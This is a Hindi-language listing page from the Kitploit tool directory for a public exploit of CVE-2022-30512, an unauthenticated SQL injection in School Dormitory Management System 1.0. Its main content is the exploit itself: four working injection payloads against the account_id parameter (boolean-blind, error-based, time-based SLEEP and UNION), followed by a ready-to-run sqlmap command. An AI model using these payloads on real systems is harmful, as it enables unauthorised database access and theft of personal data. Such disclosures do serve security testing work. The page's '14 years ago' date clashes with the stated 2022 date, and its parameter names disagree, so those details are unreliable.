Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30512 — स्कूल छात्रावास प्रबंधन प्रणाली 1.0 - बिना प्रमाणीकरण के SQL Injection | Kitploit
उपकरण/GitHubGitHub/bigzooooz/cve-2022-30512
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubbigzooooz/cve-2022-30512

CVE-2022-30512

स्कूल छात्रावास प्रबंधन प्रणाली 1.0 - बिना प्रमाणीकरण के SQL Injection

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-30512

स्कूल छात्रावास प्रबंधन प्रणाली 1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन

शोषण शीर्षक: स्कूल छात्रावास प्रबंधन प्रणाली 1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन

दिनांक: 2022-05-25

CVE: CVE-2022-30512

शोषण लेखक: Abdulaziz Saad (@b4zb0z)

विक्रेता होमपेज: https://www.sourcecodester.com/

सॉफ़्टवेयर लिंक: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

संस्करण: 1.0

परीक्षण किया गया: LAMP, Ubuntu


[#] भेद्यता का स्थान: $_GET['month'] /dms/admin/accounts/payment_history.php:31 में

Parameter: account_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: account_id=2' AND 6703=6703 AND 'jmUS'='jmUS
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: account_id=2' AND (SELECT 7343 FROM(SELECT COUNT(*),CONCAT(0x71716b7671,(SELECT (ELT(7343=7343,1))),0x7170626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'htiO'='htiO
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: account_id=2' AND (SELECT 2865 FROM (SELECT(SLEEP(5)))hWAb) AND 'pbGX'='pbGX
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: account_id=2' UNION ALL SELECT CONCAT(0x71716b7671,0x6458467273575152444c465a7a5276684f74756c7a754b6d506a6c437a5a516479574d5844694b78,0x7170626a71),NULL,NULL,NULL,NULL,NULL,NULL-- -

[#] SQLMAP का उपयोग करके शोषण: sqlmap -u "http://localhost/dms/admin/accounts/payment_history.php?account_id=2" --dbms=mysql

टूल डाउनलोड करें